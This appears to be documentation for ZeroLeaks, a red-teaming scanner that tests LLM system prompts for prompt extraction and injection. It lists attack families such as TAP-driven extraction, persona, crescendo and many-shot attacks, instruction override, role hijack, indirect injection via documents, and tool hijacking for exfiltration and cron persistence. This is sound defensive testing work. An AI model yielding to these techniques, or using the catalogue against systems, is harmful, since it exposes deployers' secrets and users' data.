Scan Types
Three scan types: Full (both), Extraction only, and Injection only. All scans run in sandbox mode with full tool execution testing.
Scan Types
Every ZeroLeaks scan runs in sandbox mode -- an isolated environment with real tool execution, canary tokens, and kill chain detection. You choose which attack surface to test by selecting a scan type.
Full (Recommended)
Purpose: Run both extraction and injection tests in a single scan. This is the default.
What it tests:
- Extraction: Up to 30 adaptive turns using TAP (Tree of Attacks with Pruning) to extract the system prompt. The Strategist selects attack categories, the Attacker generates probes, the Evaluator analyzes responses for leakage, and the Mutator refines attacks based on feedback.
- Injection: 23 probes across 8 injection types to test whether the model can be made to follow attacker-injected instructions.
- Tool execution: If your prompt defines tools (or they are auto-detected), sandbox probes test tool hijacking, indirect injection via documents, authority spoofing, multi-turn grooming, and protocol exploits.
The final score is the average of extraction and injection scores. The vulnerability level is the worst of the two.
Best for: Most use cases. Gives complete coverage in a single scan.
Duration: ~8-20 minutes.
Extraction Only
Purpose: Test whether your system prompt can be leaked or extracted through adversarial conversation.
What it tests: The scan engine runs up to 30 adaptive turns with category rotation across 19 attack types (direct, encoding, persona, social, technical, crescendo, many-shot, CoT hijack, policy puppetry, ASCII art, and more). Conversation resets occur automatically when the target becomes defensive.
Best for: Prompts where confidentiality of instructions is critical (proprietary logic, safety rules, API keys embedded in prompts).
Duration: ~5-15 minutes.
Injection Only
Purpose: Test whether the model can be made to follow attacker-injected instructions instead of your system prompt.
What it tests: 23 probes across 8 injection types:
| Type | Description |
|---|---|
| Instruction Override | Override system instructions directly |
| Behavior Modification | Change model behavior patterns |
| Policy Bypass | Bypass safety policies |
| Role Hijack | Force the model to adopt a new persona |
| Output Manipulation | Control output format or content |
| Action Execution | Execute unauthorized actions (agentic contexts) |
| Context Poisoning | Poison conversation context or memory |
| Guardrail Bypass | Bypass specific guardrails |
Each probe is evaluated for full compliance, partial compliance, or resistance.
Best for: Prompts where behavioral integrity matters (agents, assistants that must refuse harmful requests, systems processing untrusted input).
Duration: ~3-8 minutes.
Sandbox Capabilities
All scan types include sandbox features when applicable:
- Canary tokens placed in tool definitions to detect data exfiltration
- Kill chain detection for multi-step attacks that chain tool calls
- Tool hijacking probes (SSRF, RCE, curl exfiltration, cron persistence)
- Indirect injection probes (hidden instructions in PDFs, emails, code comments, JSON fields)
- Authority exploitation probes (fake system messages, maintenance windows, compliance threats)
- Protocol exploit probes (MCP shadowing, tool description poisoning, fake extension messages)
If you provide tool definitions in the advanced settings, additional dynamic probes are generated based on your specific tools (e.g., email abuse for email tools, SQL injection for database tools).